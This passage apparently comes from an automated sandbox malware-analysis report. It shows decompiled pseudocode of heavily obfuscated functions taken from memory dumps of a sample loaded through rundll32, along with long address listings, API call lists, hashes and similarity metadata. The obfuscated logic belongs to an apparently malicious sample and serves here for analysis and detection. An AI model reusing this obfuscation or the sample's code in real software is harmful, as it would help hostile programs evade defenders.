                                                                                                                                  						if(_t367 == 0x97954ea) {
                                                                                                                                  							_t335 =  *0x2f3e08; // 0x0
                                                                                                                                  							_t338 =  *0x2f3e08; // 0x0
                                                                                                                                  							_t343 =  *0x2f3e08; // 0x0
                                                                                                                                  							_t345 = E002EE395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
                                                                                                                                  							_t425 =  &(_t425[0xb]);
                                                                                                                                  							if(_t345 == 0) {
                                                                                                                                  								_t414 = 0x54d1846;
                                                                                                                                  								_t367 = 0x2db8754;
                                                                                                                                  							} else {
                                                                                                                                  								_t367 = 0xcdb2e90;
                                                                                                                                  							}
                                                                                                                                  							while(1) {
                                                                                                                                  								L1:
                                                                                                                                  								_t332 = 0x61250f6;
                                                                                                                                  								goto L2;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						if(_t367 == 0xcdb2e90) {
                                                                                                                                  							_t347 = E002D5548(_v324, _a24, _v332, _v340,  &_v276);
                                                                                                                                  							_t425 =  &(_t425[4]);
                                                                                                                                  							if(_t347 == 0) {
                                                                                                                                  								_t414 = 0x54d1846;
                                                                                                                                  							} else {
                                                                                                                                  								_t414 = 0xa80516a;
                                                                                                                                  								_t364 = 1;
                                                                                                                                  							}
                                                                                                                                  							_t367 = 0x70f4b52;
                                                                                                                                  							while(1) {
                                                                                                                                  								L1:
                                                                                                                                  								_t332 = 0x61250f6;
                                                                                                                                  								goto L2;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						if(_t367 != 0xea9523f) {
                                                                                                                                  							goto L34;
                                                                                                                                  						}
                                                                                                                                  						_t349 = E002DCF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
                                                                                                                                  						_t425 =  &(_t425[5]);
                                                                                                                                  						if(_t349 == 0) {
                                                                                                                                  							goto L37;
                                                                                                                                  						}
                                                                                                                                  						_t367 = 0x47b49b8;
                                                                                                                                  						goto L1;
                                                                                                                                  						L34:
                                                                                                                                  					} while (_t367 != 0xa80516a);
                                                                                                                                  					goto L37;
                                                                                                                                  				}
                                                                                                                                  			}






































































                                                                                                                                  0x002d66c8
                                                                                                                                  0x002d66d2
                                                                                                                                  0x002d66da
                                                                                                                                  0x002d66e2
                                                                                                                                  0x002d66ea
                                                                                                                                  0x002d66ef
                                                                                                                                  0x002d66f4
                                                                                                                                  0x002d66fc
                                                                                                                                  0x002d6704
                                                                                                                                  0x002d6712
                                                                                                                                  0x002d6717
                                                                                                                                  0x002d671d
                                                                                                                                  0x002d6722
                                                                                                                                  0x002d672a
                                                                                                                                  0x002d6732
                                                                                                                                  0x002d673a
                                                                                                                                  0x002d6742
                                                                                                                                  0x002d674a
                                                                                                                                  0x002d6757
                                                                                                                                  0x002d675a
                                                                                                                                  0x002d675e
                                                                                                                                  0x002d6766
                                                                                                                                  0x002d676e
                                                                                                                                  0x002d6776
                                                                                                                                  0x002d6783
                                                                                                                                  0x002d6787
                                                                                                                                  0x002d678f
                                                                                                                                  0x002d6797
                                                                                                                                  0x002d679f
                                                                                                                                  0x002d67a7
                                                                                                                                  0x002d67af
                                                                                                                                  0x002d67b7
                                                                                                                                  0x002d67bf
                                                                                                                                  0x002d67c7
                                                                                                                                  0x002d67cf
                                                                                                                                  0x002d67d7
                                                                                                                                  0x002d67df
                                                                                                                                  0x002d67e7
                                                                                                                                  0x002d67ef
                                                                                                                                  0x002d67f7
                                                                                                                                  0x002d67ff
                                                                                                                                  0x002d6804
                                                                                                                                  0x002d680c
                                                                                                                                  0x002d6814
                                                                                                                                  0x002d681c
                                                                                                                                  0x002d6824
                                                                                                                                  0x002d6829
                                                                                                                                  0x002d6831
                                                                                                                                  0x002d6839
                                                                                                                                  0x002d6841
                                                                                                                                  0x002d6846
                                                                                                                                  0x002d684e
                                                                                                                                  0x002d6856
                                                                                                                                  0x002d685e
                                                                                                                                  0x002d6863
                                                                                                                                  0x002d686b
                                                                                                                                  0x002d6873
                                                                                                                                  0x002d687d
                                                                                                                                  0x002d6881
                                                                                                                                  0x002d6889
                                                                                                                                  0x002d6899
                                                                                                                                  0x002d68a1
                                                                                                                                  0x002d68a6
                                                                                                                                  0x002d68b0
                                                                                                                                  0x002d68b3
                                                                                                                                  0x002d68b7
                                                                                                                                  0x002d68bb
                                                                                                                                  0x002d68c3
                                                                                                                                  0x002d68c7
                                                                                                                                  0x002d68d2
                                                                                                                                  0x002d68dd
                                                                                                                                  0x002d68e8
                                                                                                                                  0x002d68f5
                                                                                                                                  0x002d68f9
                                                                                                                                  0x002d6901
                                                                                                                                  0x002d6909
                                                                                                                                  0x002d690e
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d691b
                                                                                                                                  0x002d691b
                                                                                                                                  0x002d691b
                                                                                                                                  0x002d691b
                                                                                                                                  0x002d691d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6923
                                                                                                                                  0x002d6a56
                                                                                                                                  0x002d6a5b
                                                                                                                                  0x002d6a6d
                                                                                                                                  0x002d6a72
                                                                                                                                  0x002d6a73
                                                                                                                                  0x002d6a75
                                                                                                                                  0x002d6a7a
                                                                                                                                  0x002d6a7d
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d692f
                                                                                                                                  0x002d6a16
                                                                                                                                  0x002d6a25
                                                                                                                                  0x002d6a3d
                                                                                                                                  0x002d6a43
                                                                                                                                  0x002d6bc8
                                                                                                                                  0x002d6bc8
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6bc8
                                                                                                                                  0x002d693b
                                                                                                                                  0x002d69d8
                                                                                                                                  0x002d69da
                                                                                                                                  0x002d69df
                                                                                                                                  0x002d69e6
                                                                                                                                  0x002d69ed
                                                                                                                                  0x002d69f4
                                                                                                                                  0x002d69fd
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6947
                                                                                                                                  0x002d6999
                                                                                                                                  0x002d69a9
                                                                                                                                  0x002d699b
                                                                                                                                  0x002d699b
                                                                                                                                  0x002d699b
                                                                                                                                  0x002d69ae
                                                                                                                                  0x002d69b7
                                                                                                                                  0x002d69bc
                                                                                                                                  0x00000000
                                                                                                                                  0x002d69bc
                                                                                                                                  0x002d694f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6955
                                                                                                                                  0x002d695e
                                                                                                                                  0x002d6960
                                                                                                                                  0x002d6963
                                                                                                                                  0x002d6966
                                                                                                                                  0x002d696b
                                                                                                                                  0x002d6970
                                                                                                                                  0x002d6970
                                                                                                                                  0x002d6973
                                                                                                                                  0x002d697a
                                                                                                                                  0x002d6bdb
                                                                                                                                  0x002d6be1
                                                                                                                                  0x002d6be8
                                                                                                                                  0x002d6bf1
                                                                                                                                  0x002d6980
                                                                                                                                  0x002d6980
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d697a
                                                                                                                                  0x002d6a8d
                                                                                                                                  0x002d6bbd
                                                                                                                                  0x002d6bc3
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6bc3
                                                                                                                                  0x002d6a99
                                                                                                                                  0x002d6b34
                                                                                                                                  0x002d6b4c
                                                                                                                                  0x002d6b7d
                                                                                                                                  0x002d6b89
                                                                                                                                  0x002d6b8e
                                                                                                                                  0x002d6b93
                                                                                                                                  0x002d6b9f
                                                                                                                                  0x002d6ba4
                                                                                                                                  0x002d6b95
                                                                                                                                  0x002d6b95
                                                                                                                                  0x002d6b95
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6aa5
                                                                                                                                  0x002d6b0f
                                                                                                                                  0x002d6b14
                                                                                                                                  0x002d6b19
                                                                                                                                  0x002d6b25
                                                                                                                                  0x002d6b1b
                                                                                                                                  0x002d6b1d
                                                                                                                                  0x002d6b22
                                                                                                                                  0x002d6b22
                                                                                                                                  0x002d6b2a
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
                                                                                                                                  • API String ID: 0-2895984816
                                                                                                                                  • Opcode ID: ab303b1b3978824b086fbcacef8e9d1efe84ba17c7e6d186dbb280baab174200
                                                                                                                                  • Instruction ID: 6bb209c383560c7e07e1998b2899ad2a46c7bbaa0f8bf0d22a15bd4163df25a5
                                                                                                                                  • Opcode Fuzzy Hash: ab303b1b3978824b086fbcacef8e9d1efe84ba17c7e6d186dbb280baab174200
                                                                                                                                  • Instruction Fuzzy Hash: EB0244B25183819FC3A4CF65D589A5BBBE1FF84358F20890EF5DA86260C7B4C959CF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                                  • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                                  • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                                  • CharUpperA.USER32 ref: 10021943
                                                                                                                                  • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3249967234-0
                                                                                                                                  • Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                                  • Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
                                                                                                                                  • Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                                  • Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002D5E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				signed int _v116;
                                                                                                                                  				signed int _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				signed int _v144;
                                                                                                                                  				signed int _v148;
                                                                                                                                  				void* _t339;
                                                                                                                                  				intOrPtr _t372;
                                                                                                                                  				void* _t374;
                                                                                                                                  				intOrPtr _t381;
                                                                                                                                  				intOrPtr _t382;
                                                                                                                                  				void* _t384;
                                                                                                                                  				intOrPtr* _t385;
                                                                                                                                  				void* _t387;
                                                                                                                                  				intOrPtr _t421;
                                                                                                                                  				intOrPtr* _t423;
                                                                                                                                  				signed int _t424;
                                                                                                                                  				signed int _t425;
                                                                                                                                  				signed int _t426;
                                                                                                                                  				signed int _t427;
                                                                                                                                  				signed int _t428;
                                                                                                                                  				signed int _t429;
                                                                                                                                  				signed int _t430;
                                                                                                                                  				signed int _t431;
                                                                                                                                  				signed int _t432;
                                                                                                                                  				signed int _t433;
                                                                                                                                  				signed int _t434;
                                                                                                                                  				signed int* _t437;
                                                                                                                                  
                                                                                                                                  				_t385 = _a8;
                                                                                                                                  				_push(_t385);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_t423 = __ecx;
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t339);
                                                                                                                                  				_v12 = 0xbcdf6a;
                                                                                                                                  				_t437 =  &(( &_v148)[4]);
                                                                                                                                  				_t421 = 0;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_t387 = 0xc04f77e;
                                                                                                                                  				_v92 = 0x11f6ef;
                                                                                                                                  				_v92 = _v92 + 0xffffb184;
                                                                                                                                  				_t424 = 0x71;
                                                                                                                                  				_v92 = _v92 / _t424;
                                                                                                                                  				_t425 = 0x24;
                                                                                                                                  				_v92 = _v92 / _t425;
                                                                                                                                  				_v92 = _v92 ^ 0x0000011d;
                                                                                                                                  				_v56 = 0xfaa796;
                                                                                                                                  				_v56 = _v56 >> 0xc;
                                                                                                                                  				_v56 = _v56 << 0xa;
                                                                                                                                  				_v56 = _v56 ^ 0x003ea801;
                                                                                                                                  				_v36 = 0x1650e4;
                                                                                                                                  				_v36 = _v36 + 0xce7;
                                                                                                                                  				_v36 = _v36 ^ 0x00165dcb;
                                                                                                                                  				_v116 = 0x54bb44;
                                                                                                                                  				_v116 = _v116 + 0xffff1cdd;
                                                                                                                                  				_v116 = _v116 + 0xffffa99d;
                                                                                                                                  				_v116 = _v116 + 0xa8e5;
                                                                                                                                  				_v116 = _v116 ^ 0x00542aa3;
                                                                                                                                  				_v148 = 0xce1ee6;
                                                                                                                                  				_v148 = _v148 ^ 0xff8bbe67;
                                                                                                                                  				_v148 = _v148 | 0x521cb43f;
                                                                                                                                  				_v148 = _v148 << 1;
                                                                                                                                  				_v148 = _v148 ^ 0xfebb697e;
                                                                                                                                  				_v52 = 0xc2bf1c;
                                                                                                                                  				_v52 = _v52 << 0xc;
                                                                                                                                  				_t426 = 0x73;
                                                                                                                                  				_v52 = _v52 / _t426;
                                                                                                                                  				_v52 = _v52 ^ 0x0061d2eb;
                                                                                                                                  				_v88 = 0x8d6fba;
                                                                                                                                  				_v88 = _v88 * 0x6a;
                                                                                                                                  				_v88 = _v88 * 0x21;
                                                                                                                                  				_v88 = _v88 >> 0xb;
                                                                                                                                  				_v88 = _v88 ^ 0x00119314;
                                                                                                                                  				_v48 = 0xec8dbc;
                                                                                                                                  				_v48 = _v48 + 0xffff0a61;
                                                                                                                                  				_v48 = _v48 | 0x0a9d8147;
                                                                                                                                  				_v48 = _v48 ^ 0x0affcc17;
                                                                                                                                  				_v24 = 0xd16d2c;
                                                                                                                                  				_v24 = _v24 >> 2;
                                                                                                                                  				_v24 = _v24 ^ 0x003dd5e6;
                                                                                                                                  				_v124 = 0xaffa28;
                                                                                                                                  				_v124 = _v124 >> 9;
                                                                                                                                  				_v124 = _v124 * 9;
                                                                                                                                  				_v124 = _v124 ^ 0x3775f33c;
                                                                                                                                  				_v124 = _v124 ^ 0x377a4e54;
                                                                                                                                  				_v76 = 0x9eb952;
                                                                                                                                  				_v76 = _v76 >> 0xd;
                                                                                                                                  				_v76 = _v76 << 0xa;
                                                                                                                                  				_v76 = _v76 ^ 0x00160abd;
                                                                                                                                  				_v108 = 0x8bec79;
                                                                                                                                  				_t427 = 0x28;
                                                                                                                                  				_v108 = _v108 * 0x30;
                                                                                                                                  				_v108 = _v108 + 0xffff86d5;
                                                                                                                                  				_v108 = _v108 + 0xffff5405;
                                                                                                                                  				_v108 = _v108 ^ 0x1a3a719b;
                                                                                                                                  				_v132 = 0x74267e;
                                                                                                                                  				_v132 = _v132 + 0x1b76;
                                                                                                                                  				_v132 = _v132 << 4;
                                                                                                                                  				_v132 = _v132 + 0xffff1414;
                                                                                                                                  				_v132 = _v132 ^ 0x074c11a2;
                                                                                                                                  				_v100 = 0x4236e1;
                                                                                                                                  				_v100 = _v100 ^ 0x96e608d5;
                                                                                                                                  				_v100 = _v100 / _t427;
                                                                                                                                  				_t428 = 0x2d;
                                                                                                                                  				_v100 = _v100 * 0x6c;
                                                                                                                                  				_v100 = _v100 ^ 0x96bd808a;
                                                                                                                                  				_v84 = 0xb83730;
                                                                                                                                  				_v84 = _v84 + 0xffffd15d;
                                                                                                                                  				_v84 = _v84 >> 0xb;
                                                                                                                                  				_v84 = _v84 ^ 0x0009ec33;
                                                                                                                                  				_v140 = 0x532b06;
                                                                                                                                  				_v140 = _v140 ^ 0xb0124270;
                                                                                                                                  				_v140 = _v140 << 1;
                                                                                                                                  				_v140 = _v140 / _t428;
                                                                                                                                  				_v140 = _v140 ^ 0x02279f8d;
                                                                                                                                  				_v44 = 0x33dfa;
                                                                                                                                  				_v44 = _v44 + 0x1c37;
                                                                                                                                  				_v44 = _v44 ^ 0x000817ba;
                                                                                                                                  				_v136 = 0x1bf887;
                                                                                                                                  				_v136 = _v136 ^ 0x189cf430;
                                                                                                                                  				_v136 = _v136 + 0xffff0896;
                                                                                                                                  				_v136 = _v136 ^ 0xf213b32f;
                                                                                                                                  				_v136 = _v136 ^ 0xea9313b1;
                                                                                                                                  				_v144 = 0xffa314;
                                                                                                                                  				_v144 = _v144 >> 7;
                                                                                                                                  				_v144 = _v144 ^ 0x35f9e2de;
                                                                                                                                  				_t429 = 0x1f;
                                                                                                                                  				_v144 = _v144 * 0x5b;
                                                                                                                                  				_v144 = _v144 ^ 0x2f3e99d8;
                                                                                                                                  				_v68 = 0x41f910;
                                                                                                                                  				_v68 = _v68 / _t429;
                                                                                                                                  				_v68 = _v68 ^ 0x28681de5;
                                                                                                                                  				_v68 = _v68 ^ 0x2865ac71;
                                                                                                                                  				_v96 = 0x6e33;
                                                                                                                                  				_v96 = _v96 << 4;
                                                                                                                                  				_v96 = _v96 ^ 0xe7b8475a;
                                                                                                                                  				_v96 = _v96 << 1;
                                                                                                                                  				_v96 = _v96 ^ 0xcf7b3a2b;
                                                                                                                                  				_v104 = 0xedfca3;
                                                                                                                                  				_t430 = 0x5e;
                                                                                                                                  				_v104 = _v104 * 0x5f;
                                                                                                                                  				_v104 = _v104 | 0x0b07679d;
                                                                                                                                  				_v104 = _v104 ^ 0xc050dc4c;
                                                                                                                                  				_v104 = _v104 ^ 0x9b058770;
                                                                                                                                  				_v112 = 0xe25509;
                                                                                                                                  				_v112 = _v112 ^ 0xf6d0fdca;
                                                                                                                                  				_v112 = _v112 / _t430;
                                                                                                                                  				_v112 = _v112 ^ 0x02984cdf;
                                                                                                                                  				_v40 = 0xf7137d;
                                                                                                                                  				_v40 = _v40 << 8;
                                                                                                                                  				_v40 = _v40 ^ 0xf71f8dee;
                                                                                                                                  				_v64 = 0x5508e8;
                                                                                                                                  				_v64 = _v64 << 4;
                                                                                                                                  				_v64 = _v64 | 0x94c676b5;
                                                                                                                                  				_v64 = _v64 ^ 0x95dffb87;
                                                                                                                                  				_v120 = 0xc732ae;
                                                                                                                                  				_t431 = 0x75;
                                                                                                                                  				_v120 = _v120 / _t431;
                                                                                                                                  				_v120 = _v120 << 7;
                                                                                                                                  				_t432 = 0x2c;
                                                                                                                                  				_v120 = _v120 / _t432;
                                                                                                                                  				_v120 = _v120 ^ 0x000601dd;
                                                                                                                                  				_v72 = 0x179b9;
                                                                                                                                  				_v72 = _v72 >> 1;
                                                                                                                                  				_v72 = _v72 << 0xb;
                                                                                                                                  				_v72 = _v72 ^ 0x05ec7a60;
                                                                                                                                  				_v28 = 0x46261b;
                                                                                                                                  				_t433 = 0x35;
                                                                                                                                  				_v28 = _v28 / _t433;
                                                                                                                                  				_v28 = _v28 ^ 0x000e773f;
                                                                                                                                  				_v128 = 0xfd046c;
                                                                                                                                  				_v128 = _v128 << 1;
                                                                                                                                  				_v128 = _v128 << 3;
                                                                                                                                  				_v128 = _v128 + 0xffff42a9;
                                                                                                                                  				_v128 = _v128 ^ 0x0fc89804;
                                                                                                                                  				_v60 = 0xb39cb2;
                                                                                                                                  				_v60 = _v60 + 0xffffa360;
                                                                                                                                  				_v60 = _v60 ^ 0x6e5a7866;
                                                                                                                                  				_v60 = _v60 ^ 0x6eef17c9;
                                                                                                                                  				_v32 = 0xb015d5;
                                                                                                                                  				_t434 = 0x33;
                                                                                                                                  				_v32 = _v32 / _t434;
                                                                                                                                  				_v32 = _v32 ^ 0x00082471;
                                                                                                                                  				_v80 = 0x87b3ae;
                                                                                                                                  				_v80 = _v80 + 0xffffe530;
                                                                                                                                  				_v80 = _v80 << 2;
                                                                                                                                  				_v80 = _v80 ^ 0x021b575c;
                                                                                                                                  				while(_t387 != 0x5e373ec) {
                                                                                                                                  					if(_t387 == 0x87b20b3) {
                                                                                                                                  						_t372 =  *0x2f3dfc; // 0x0
                                                                                                                                  						_t374 = E002DCA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
                                                                                                                                  						_t437 =  &(_t437[0x12]);
                                                                                                                                  						if(_t374 == _v88) {
                                                                                                                                  							 *_t385 = _v20;
                                                                                                                                  							_t421 = 1;
                                                                                                                                  							 *((intOrPtr*)(_t385 + 4)) = _v16;
                                                                                                                                  						} else {
                                                                                                                                  							_t387 = 0x5e373ec;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						if(_t387 == 0xc04f77e) {
                                                                                                                                  							_t387 = 0xd382560;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t387 == 0xc68a5f7) {
                                                                                                                                  								_push(_t387);
                                                                                                                                  								_push(_t387);
                                                                                                                                  								_t381 = E002D7FF2(_v16);
                                                                                                                                  								_v20 = _t381;
                                                                                                                                  								if(_t381 != 0) {
                                                                                                                                  									_t387 = 0x87b20b3;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								if(_t387 != 0xd382560) {
                                                                                                                                  									L14:
                                                                                                                                  									if(_t387 != 0x4d23f0b) {
                                                                                                                                  										continue;
                                                                                                                                  									} else {
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									_t382 =  *0x2f3dfc; // 0x0
                                                                                                                                  									_t384 = E002DCA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
                                                                                                                                  									_t437 =  &(_t437[0x12]);
                                                                                                                                  									if(_t384 == _v148) {
                                                                                                                                  										_t387 = 0xc68a5f7;
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _t421;
                                                                                                                                  				}
                                                                                                                                  				E002E8519(_v32, _v80, _v20);
                                                                                                                                  				_t387 = 0x4d23f0b;
                                                                                                                                  				goto L14;
                                                                                                                                  			}





























































                                                                                                                                  0x002d6167
                                                                                                                                  0x002d616b
                                                                                                                                  0x002d6173
                                                                                                                                  0x002d617b
                                                                                                                                  0x002d6183
                                                                                                                                  0x002d6188
                                                                                                                                  0x002d6190
                                                                                                                                  0x002d6194
                                                                                                                                  0x002d619c
                                                                                                                                  0x002d61a9
                                                                                                                                  0x002d61aa
                                                                                                                                  0x002d61ae
                                                                                                                                  0x002d61b6
                                                                                                                                  0x002d61be
                                                                                                                                  0x002d61c6
                                                                                                                                  0x002d61ce
                                                                                                                                  0x002d61dc
                                                                                                                                  0x002d61e8
                                                                                                                                  0x002d61f0
                                                                                                                                  0x002d61fa
                                                                                                                                  0x002d61ff
                                                                                                                                  0x002d6207
                                                                                                                                  0x002d620f
                                                                                                                                  0x002d6214
                                                                                                                                  0x002d621c
                                                                                                                                  0x002d6224
                                                                                                                                  0x002d6232
                                                                                                                                  0x002d6237
                                                                                                                                  0x002d623d
                                                                                                                                  0x002d6246
                                                                                                                                  0x002d624b
                                                                                                                                  0x002d6251
                                                                                                                                  0x002d6259
                                                                                                                                  0x002d6261
                                                                                                                                  0x002d6265
                                                                                                                                  0x002d626a
                                                                                                                                  0x002d6272
                                                                                                                                  0x002d6284
                                                                                                                                  0x002d6289
                                                                                                                                  0x002d6292
                                                                                                                                  0x002d629d
                                                                                                                                  0x002d62a5
                                                                                                                                  0x002d62a9
                                                                                                                                  0x002d62ae
                                                                                                                                  0x002d62b6
                                                                                                                                  0x002d62be
                                                                                                                                  0x002d62c6
                                                                                                                                  0x002d62ce
                                                                                                                                  0x002d62d6
                                                                                                                                  0x002d62de
                                                                                                                                  0x002d62f0
                                                                                                                                  0x002d62f8
                                                                                                                                  0x002d62ff
                                                                                                                                  0x002d630a
                                                                                                                                  0x002d6312
                                                                                                                                  0x002d631a
                                                                                                                                  0x002d631f
                                                                                                                                  0x002d6327
                                                                                                                                  0x002d6335
                                                                                                                                  0x002d6418
                                                                                                                                  0x002d647f
                                                                                                                                  0x002d6484
                                                                                                                                  0x002d648b
                                                                                                                                  0x002d64c8
                                                                                                                                  0x002d64ca
                                                                                                                                  0x002d64d2
                                                                                                                                  0x002d648d
                                                                                                                                  0x002d648d
                                                                                                                                  0x00000000
                                                                                                                                  0x002d648d
                                                                                                                                  0x002d633b
                                                                                                                                  0x002d6341
                                                                                                                                  0x002d640e
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6347
                                                                                                                                  0x002d634d
                                                                                                                                  0x002d63ec
                                                                                                                                  0x002d63ed
                                                                                                                                  0x002d63ee
                                                                                                                                  0x002d63f3
                                                                                                                                  0x002d63fe
                                                                                                                                  0x002d6404
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6404
                                                                                                                                  0x002d6353
                                                                                                                                  0x002d6359
                                                                                                                                  0x002d64b1
                                                                                                                                  0x002d64b7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d64bd
                                                                                                                                  0x002d635f
                                                                                                                                  0x002d635f
                                                                                                                                  0x002d63bd
                                                                                                                                  0x002d63c2
                                                                                                                                  0x002d63c9
                                                                                                                                  0x002d63cf
                                                                                                                                  0x00000000
                                                                                                                                  0x002d63cf
                                                                                                                                  0x002d63c9
                                                                                                                                  0x002d6359
                                                                                                                                  0x002d634d
                                                                                                                                  0x002d6341
                                                                                                                                  0x002d64e1
                                                                                                                                  0x002d64e1
                                                                                                                                  0x002d64a6
                                                                                                                                  0x002d64ac
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
